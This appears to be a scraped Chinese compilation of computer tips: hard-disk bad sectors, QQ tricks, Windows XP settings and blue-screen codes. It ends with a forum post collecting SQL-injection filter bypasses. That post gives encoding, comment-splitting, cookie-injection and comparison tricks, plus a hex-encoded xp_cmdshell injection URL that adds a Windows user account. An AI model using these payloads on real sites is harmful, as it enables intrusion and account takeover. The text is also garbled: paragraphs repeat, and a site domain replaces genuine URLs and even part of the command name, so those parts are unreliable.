如何屏蔽硬盘坏道
最近帮朋友搬家时,找到一块很早的40GB硬盘,朋友说是两年前更换下来的,并且坏了无法使用。笔者将硬盘拿回家几经周折,总算将它“救活”了,虽然无法安装Windows系统,但让它“变”成了一块移动硬盘。
一、故障现象
将硬盘拿回家后,笔者将自己电脑上的硬盘拔出,然后接上这块40GB硬盘,开机后主板BIOS和开机自检都可以找到硬盘,但进入DOS模式后,使用Fdisk或Format命令都无法找到硬盘。将原机硬盘与40GB硬盘同时接上,使用双硬盘开机引导进入Windows系统,在“我的电脑”中并没有发现40GB硬盘的盘符,不过在“设备管理器”里却出现了40GB硬盘标记。
二、屏蔽坏道
根据笔者的经验,既然系统可以识别这块硬盘,说明硬盘的逻辑电路并没有坏,而是硬盘出现了物理坏道,这种情况的修复希望比较大,硬盘坏道处理软件很多,并可以对硬盘坏道进行自动处理,但处理后的效果并不完整,譬如修复后格式化到99%后就无法继续。由于需要在Windows下处理硬盘,因而笔者下载了PartitionMagic分区工具,它允许用户手工处理坏道,达到完美隐藏坏道的目的。
运行软件后,果然可以检测到两块硬盘(如图),并显示出40GB的坏硬盘具有4个分区。为了便于修复工作,笔者先将3个逻辑分区合并成一个分区,并将所有分区都转换成FAT32格式,执行“分区”菜单下的“CheckDisk”命令,对硬盘进行直接扫描。如果该分区有坏道,此时程序会自动标记分区坏簇,执行“分区”菜单下“高级”中的“坏扇区重新测试”命令,此时会将硬盘分区的全部坏簇标记出来,将这些坏簇分成一个独立的分区,最后再执行“高级”选项下的“隐藏分区”命令,然后将分区隐藏即可。
三、后期处理
确保坏道被完全隐藏后,点“应用”按钮后重新启动系统,再次进入“我的电脑”,发现多出了两个盘符,并且可以进行数据拷贝和读写操作,也就是说,这块坏硬盘被修复好了,但硬盘容量却从40GB变成了32GB,其它8GB被隐藏起来了,这8GB就是硬盘坏道分区。关机后将该硬盘单独接到机器上,此时安装Windows系统时,提示无法继续安装,后来才知道,原来是由于硬盘的坏扇区位于磁头最前面,被隐藏起来后,Windows安装程序无法检测到主扇区。
尽管32GB容量看起来不大,但把它作为辅助存储设备也不错,于是花50元买了一块3.5英寸的硬盘盒,组装了一个移动硬盘,接到主板USB接口上,系统找到了USB即插即用设备,并同样在“我的电脑”中显示了两个可用的分区盘符,笔者将一些重要数据保存在这里,以备日后系统崩溃时进行恢复。
编后:更多硬件疑难杂症的解决方法,可参阅由电脑报电子音像出版社最新出版的“电脑报编辑部主编推荐宝典”之《电脑故障急救指南》一书。该书已在全国新华书店和书报摊市场上市。如需邮购,可访问电脑报官方网站团购平台:
永远不进别人QQ黑名单的方法
知识重点:大家知道,如果你的QQ好友不再认为你是好友,而将你拉入黑名单当中,则你发送的任何QQ消息都将不会响应到对方QQ,并且你在下次重新登录QQ时,对方的头像图标也将会在你的好友列表中消失。理论上..
大家知道,如果你的QQ好友不再认为你是好友,而将你拉入黑名单当中,则你发送的任何QQ消息都将不会响应到对方QQ,并且你在下次重新登录QQ时,对方的头像图标也将会在你的好友列表中消失。理论上对方删不删你是对方的自由,而你同不同意对方删你则是你的自由大家知道,如果你的QQ好友不再认为你是“好友”,而将你拉入黑名单当中,则你发送的任何QQ消息都将不会响应到对方QQ,并且你在下次重新登录QQ时,对方的头像图标也将会在你的好友列表中消失。理论上对方删不删你是对方的自由,而你同不同意对方删你则是你的自由。如果你不愿对方删你,则你可以通过下面的方法迫使对方将你重新加对方为好友:首先从QQ的“系统消息”记录中找到对方好友请求你通过身份验证的那则系统消息记录,然后双击,在接下来弹出的“系统消息”对话框中分别单击“通过验证”和“加为好友”按钮,则你的QQ头像图标又会不知不觉地出现在对方好友列表中了。怎么样?是不是挺绝的?对方说不定还正在纳闷呢!但是,如果你的系统消息没有保留,或者是你主动请求对方通过身份验证和对方设置允许任何人列为好友就找不到这条消息了。但应该说明的是,做朋友就以友情为先,关系不好,加了也白加,聊什么也没劲。
巧妙拦截QQ广告防火墙也能“兼职”
知识重点:QQ的广告十分了得,尤其是聊天窗口上的广告,晃来晃去的特别抢眼,你即便是将其广告文件夹删除,眨眼之间就能下载,既使将升级程序也删除,只要一登录QQ,它就会自动检测升级程序,一旦发现升级..
QQ的广告十分了得,尤其是聊天窗口上的广告,晃来晃去的特别抢眼,你即便是将其广告文件夹删除,眨眼之间就能下载,既使将升级程序也删除,只要一登录QQ,它就会自动检测升级程序,一旦发现升级程序损坏,不论你是否同意,它都能自动下载并修复升级程序。若QQ的广告十分了得,尤其是聊天窗口上的广告,晃来晃去的特别抢眼,你即便是将其广告文件夹删除,眨眼之间就能下载,既使将升级程序也删除,只要一登录QQ,它就会自动检测升级程序,一旦发现升级程序损坏,不论你是否同意,它都能自动下载并修复升级程序。若是QQ会员,还可以屏蔽QQ广告,迷你首页也可以在个人设置中,点击“系统设置—登录设置”,在会员登录设置项中将“显示腾讯网迷你首页”前面的钩去掉,在聊天或工作中不再弹出广告或迷你首页窗口。那么,不是腾讯的QQ会员的难道就不能屏蔽QQ广告和迷你首页了?下面就以腾讯官方的QQ2007Ⅱ为例,现在的电脑中基本上都安装杀毒软件与防火墙等安全软件,防火墙作用主要是阻止非法(网络病毒)访问与网络攻击,保障我们的网络安全。那么能不能让防火墙也做点兼职工作?既然防火墙能阻止非法的网络访问,那么合法的访问不就更容易阻止了?先打开QQ安装文件(默认的安装路径是在C:/ProgramFilesTencent文件中,如果找不到的话也可以在桌面上右击QQ图标,选择‘属性’,在打开的属性窗口中,点击‘快捷方式’标签,在目标框中显示的就是QQ的文件所在位置,打开QQ文件夹,找到名为“AD(有时是大写也有时是小写)”和“Dat”的文件夹,右击鼠标,执行删除,再找到QQexternal.exe(迷你新闻首页的程序)文件夹也将其删除。打开防火墙(以风云防火墙为例),点击“应用程序规则”,在打开的“应用程序规则”中,在窗口下方点击“增加规则”,在弹出的“增加应用程序规则”窗口中,在文件下点击“选择”,在弹出的“选择要增加的程序”窗口中,点击我的电脑,按照QQ的安装路径打开QQ文件夹,依次打开并选择“QQLiveUpdate、QQMusicUpdate、QQUpdateCenter、Timwp”升级程序,将“TCP协议连接”下的“允许对外TCP协议连接”前面的钩去掉,并将“UDP协议发送数据”下面的“允许对外UDP协议发送数据”前面的钩也去掉,将“本地TCP协议端口监听及本地UDP协议端口监听”选择禁止,在“不符合以上条件时”框中选择“拦截操作”,之后点击“确定”即可。如有必要也可以将“QQLiveUpdate、QQMusicUpdate、QQUpdateCenter、Timwp”升级程序删除。这样每当我们登录QQ后,QQ会自动检测QQ程序,此时防火墙就会拦截QQ程序的访问,当防火墙拦截到QQ程序访问时,可选择“允许”,而当防火墙拦截到QQ发送数据时,应选择“禁止”。当QQ检测到其广告程序损坏后,会自动修复(升级)广告程序,由于我们在防火墙中将“QQLiveUpdate、QQMusicUpdate、QQUpdateCenter、Timwp”这几个升级程序进行了拦截,所以QQ程序并不能升级其程序,也就是说不能下载更新其广告程序了,我们聊天时的窗口也就清爽了许多。QQ目录中还有一个是QQDoctor文件夹,是QQ医生文件,如果你要是嫌QQ医生烦人,可以直接删除。最好是用超级兔子的智能卸载程序卸载,这样比直接删除,文件清除更干净。
130条最常用的电脑知识
知识重点:130条最常用的电脑知识学会下面130条电脑知识基本上对电脑系统就有了很大的了解,有时候看到了好多用的知识,可是用不到,到用到的时候又想不起来在那看到的,希望广大网友收藏本网站www.xiaoshuodaquan.com..
130条最常用的电脑知识
学会下面130条电脑知识基本上对电脑系统就有了很大的了解,有时候看到了好多用的知识,可是用不到,到用到的时候又想不起来在那看到的,希望广大网友收藏本网站www.xiaoshuodaquan.com
1.重装WindowsXP不需再激活
如果你需要重装WindowsXP,通常必须重新激活。事实上只要在第一次激活时,备份好WindowsSystem32目录中的Wpa.dbl文件,就不用再进行激活的工作了。在重装WindowsXP后,只需要复制该文件到上面的目录即可。
2.如何知道自己的WindowsXP是否已激活
打开开始→运行,在弹出的对话框中输入:oobe/msoobe/a,回车后系统会弹出窗口告诉你系统是否已经激活。电脑知识
3.关闭zip文件夹功能
你是不是觉得WindowsXP中的zip文件夹功能太慢,功能也不吸引人?如果是这样,你可以打开开始→运行,在弹出的对话框中输入:regsvr32/uzipfldr.dll,回车后即可关闭ZIP文件夹功能。
4.让WindowsXP也能刻ISO文件
WindowsXP没有提供直接刻录ISO文件的功能,不过你可以下载一个第三方插件来为系统增加这个功能。该插件的下载地址为:http://www.xiaoshuodaquan.com/alexfein/is...rderSetup.msi
5.登陆界面背景变变色
打开注册表编辑器,找到[HKEY-USERS.DEFAULTControlPanelColors],将Background的值改为“000”(不带引号),这样登录背景就成了黑色。
6.完全卸载XP
有些朋友在安装WindowsXP后发现自己并不喜欢这个操作系统,这时你可以用Windows98安装光盘启动到DOS状态,然后键入:format-ur这样可以删除所有XP的文件,并可重新安装Windows98/Me。
7.系统救命有稻草
当怀疑系统重新启动之前针对计算机所进行的更改可能导致故障,可以在启动系统时按F8键,选择“最后一次正确的配置”来恢复对系统所做的更改。
8.恢复硬件以前的驱动程序
在安装了新的硬件驱动程序后发现系统不稳定或硬件无法工作时,只需在“设备管理器”中选择“驱动程序恢复”按钮,即可恢复到先前正常的系统状态。但不能恢复打印机的驱动程序。
9.自动登陆
单击开始→运行,输入“rundll32netplwiz.dll,UsersRunDll”(不带引号),然后在UserAccounts中取消“Usersmustenterausernameandpasswordtousethiscomputer”,单击“OK”,接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。
10.快速关机或重启的快捷键(可定时)
在桌面点击鼠标右键,选择新建(快捷方式,在弹出的向导中输入位置为:C:WINDOWSsystem32shutdown.exe-s-t10(其中的-s可以改为-r,也就是重新启动,而-t10表示延迟10秒,你可以根据自己的需要更改这个数字)。制作完这个快捷键后,按照上面的方法为它指定一个图标。
这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机(重启),而且你可以在后面加上“-c"我要关机啦!"”,这样这句话会显示在对话框中,当然文字你可以随意写,但要注意不能超过127个字符。
QQ手机邮箱文件中转站也可以续期啦
知识重点:QQ邮箱提供了文件中转站功能,可以临时保存一些文件在里面,是个很方便的网络U盘。但是文件中转站也有一定的存储时间限制,一般只能存储7天左右,操作这个时间,系统就会删除过期的文件了,所以..
QQ邮箱提供了文件中转站功能,可以临时保存一些文件在里面,是个很方便的网络U盘。但是文件中转站也有一定的存储时间限制,一般只能存储7天左右,操作这个时间,系统就会删除过期的文件了,所以经常一些需要使用的文件,还得经常续期,以保存更长的时间。最QQ邮箱提供了文件中转站功能,可以临时保存一些文件在里面,是个很方便的“网络U盘”。但是文件中转站也有一定的存储时间限制,一般只能存储7天左右,操作这个时间,系统就会删除过期的文件了,所以经常一些需要使用的文件,还得经常续期,以保存更长的时间。最近有不少朋友来反馈,说常常忘记续期,或者因为出差无法及时登录邮箱续期,而导致文件被删除,想用的时候才发现文件不在了。那么有没有什么办法,可以及时去续期呢?当然有了,QQ手机邮箱最近推出了文件中转站续期功能,无论您在哪里,只要用手机登录手机QQ邮箱(www.xiaoshuodaquan.com.com),就可以直接在手机邮箱的文件中转站完成续期功能了,所以,再也不用担心因为没有及时续期而导致文件丢失了。另外还提供了转发功能,重要的文件,也可以及时转给客户了,方便快捷。同时,QQ手机邮箱还提供了记事本、阅读空间等功能,赶快登录体验一下吧。
电脑蓝屏怎么办看蓝屏代码找出电脑蓝屏的原因
知识重点:电脑蓝屏怎么办看蓝屏代码找出电脑蓝屏的原因一蓝屏时显示的信息1.故障检查信息***STOP0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4)KMODE_EXCEPTION_NOT_HANDLED***其中错误..
电脑蓝屏怎么办看蓝屏代码找出电脑蓝屏的原因
一蓝屏时显示的信息
1.故障检查信息
***STOP0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4)
KMODE_EXCEPTION_NOT_HANDLED***
其中错误的第一部分是停机码(StopCode)也就是STOP0x0000001E,用于识别已发生错误的类型,错误第二部分是被括号括起来的四个数字集,表示随机的开发人员定义的参数(这个参数对于普通用户根本无法理解,只有驱动程序编写者或者微软操作系统的开发人员才懂).第三部分是错误名.信息第一行通常用来识别生产错误的驱动程序或者设备.这种信息多数很简洁,但停机码可以作为搜索项在微软知识库和其他技术资料中使用.
2.推荐操作
蓝屏第二部分是推荐用户进行的操作信息.有时,推荐的操作仅仅是一般性的建议(比如:到销售商网站查找BIOS的更新等);有时,也就是显示一条与当前问题相关的提示.一般来说,惟一的建议就是重启.
3.调试端口告诉用户内存转储映像是否写到磁盘商了,使用内存转储映像可以确定发生问题的性质,还会告诉用户调试信息是否被传到另一台电脑商,以及使用了什么端口完成这次通讯.(说实在的,在发生蓝屏时只要记下STOP:后面的停机码就行~)
二蓝屏时的处理办法
1.重启
有时只是某个程序或驱动程序一时犯错,重启后有可能就会正常。
2.新硬件
首先,应该检查新硬件是否插牢,这个被许多人忽视的问题往往会引发许多莫名其妙的故障.如果确认没有问题,将其拔下,然后换个插槽试试,并安装最新的驱动程序.同时还应对照微软网站的硬件兼容类别检查一下硬件是否与操作系统兼容.如果你的硬件没有在表中,那么就得到硬件厂商网站进行查询,或者拨打他们的咨询电话.
3.新驱动和新服务
如果刚安装完某个硬件的新驱动,或安装了某个软件,而它又在系统服务中添加了相应项目(比如:杀毒软件、CPU降温软件、防火墙软件等),在重启或使用中出现了蓝屏故障,请到安全模式来卸载或禁用它们.
4.检查病毒
比如冲击波和振荡波等病毒有时会导致Windows蓝屏死机,因此查杀病毒必不可少.同时一些木马间谍软件也会引发蓝屏,所以最好再用相关工具进行扫描检查.
5.检查BIOS和硬件兼容性
对于新装的电脑经常出现蓝屏问题,应该检查并升级BIOS到最新版本,同时关闭其中的内存相关项,比如:缓存和映射.另外,还应该对照微软的硬件兼容列表检查自己的硬件.还有就是,如果主板BIOS无法支持大容量硬盘也会导致蓝屏,需要对其进行升级.
6.检查系统曰志
在开始-->菜单中输入:EventVwr.msc,回车出现"事件查看器",注意检查其中的"系统曰志"和"应用程序曰志"中表明"错误"的项.
7.查询停机码
把蓝屏中的停机码记下来,接着到其他电脑中上网,进入微软网站http://www.xiaoshuodaquan.com/,在左上角的"搜索(知识库)"中输入停机码,如果搜索结果没有适合信息,可以选择"英文知识库"在搜索一遍.一般情况下,会在这里找到有用的解决案例.另外,在baidu、Google等搜索引擎中使用蓝屏的停机码或者后面的说明文字为关键词搜索,往往也会有以外的收获.
8.最后一次正确配置电脑知识
一般情况下,蓝屏都出现于更新了硬件驱动或新加硬件并安装其驱动后,这时Windows2K/XP提供的"最后一次正确配置"就是解决蓝屏的快捷方式.重启系统,在出现启动菜单时按下F8键就会出现高级启动选项菜单,接着选择"最后一次正确配置".
绕过注入限制继续注入的一些方法收集
发布:2009-6-0106:47|作者:01|查看:2次
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“‘”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
经过我的收集,大部分的防注入程序都过滤了以下关键字:
and|‘|‘|chr|‘|%20from|;|‘|mid|master.|set|=
而这里最难处理的就是‘这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。例如or1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or‘swords‘=‘swords‘,由于mssql的松散性,我们可以把or‘swords‘之间的空格去掉,并不影响运行。
3、运用字符串判断代替
用经典的or1=1判断绕过,如or‘swords‘=‘swords‘,这个方法就是网上在讨论的。
4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or‘swords‘=N‘swords‘,大写的N告诉mssqlserver字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如or‘swords‘=‘sw‘+‘ords‘;EXEC(‘IN‘+‘SERTINTO‘+‘…..‘)
6、通过LIKE绕过
以前怎么就没想到呢?如or‘swords‘LIKE‘sw‘!!!显然可以很轻松的绕过“=”“>”的限制……
7、通过IN绕过
与上面的LIKE的思路差不多,如or‘swords‘IN(‘swords‘)
8、通过BETWEEN绕过
如or‘swords‘BETWEEN‘rw‘AND‘tw‘
9、通过>或者<绕过
or‘swords‘>‘sw‘
or‘swords‘<‘tw‘
or1<3
……
10、运用注释语句绕过
用/**/代替空格,如:UNION/**/Select/**/user,pwd,fromtbluser
用/**/分割敏感词,如:U/**/NION/**/SE/**/LECT/**/user,pwdfromtbluser
11、用HEX绕过,一般的IDS都无法检测出来
0x730079007300610064006D0069006E00=hex(sysadmin)
0x640062005F006F0077006E0065007200=hex(db_owner)
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
declare@asysname
‘@a=
www.xiaoshuodaquan.com_cmdshell@a
效果http://www.xiaoshuodaquan.com/show.asp?id=1;declare%20@a%20sysname
%20‘%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%www.xiaoshuodaquan.com_cmdshell%20@a;--
其中的0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400就是“netuserangelpass/add”的意思。
12.当防注入系统阻止了注入时,可尝试使用request.cookie方式进行注入!一般网站防注入系统不会对用这种方式提交上来的数据进行过滤!(貌似说的不够详细,下面我来补充)
--------------------------------------------------------------------------------------------
另外的方法:
一、有些站的防注入系统有缺陷,起不到很好的防注入功能,可以被简单的绕过。比如这个的参数asp?id=123你可以把id转化为%69%64然后把地址填进注入工具就可以继续注入了。
二、还有的防注入系统会把非法提交的参数进行记录,然后写入到asp文件中,这样做的结果会导致被写入一句话木马,留下了新的安全隐患。
关于cookie注入是一个比较好的绕过注入防护继续注入的方法,原理就是request.cookie提交的数据一般不会被过滤,你可以手工进行(网上教程很多,不明白的可以搜索下),当然比较麻烦;另外你也可以使用工具。如一些支持cookie修改功能的浏览器,加上SQL语句进行注入,还有寂寞的刺猬写的这个小工具(ps:要的可以留言,最新的版本哦)间接通过注入工具注入,另外邪恶八进制上了有人发的一个PHP写的支持cookie注入的工具,其实就是一个PHP脚本(我的站上有)。还有蝉之刃1.5也支持cookie注入,本人没怎么使用,感觉不大好用,实际效果没怎么测试。
书书网手机版 m.1pwx.com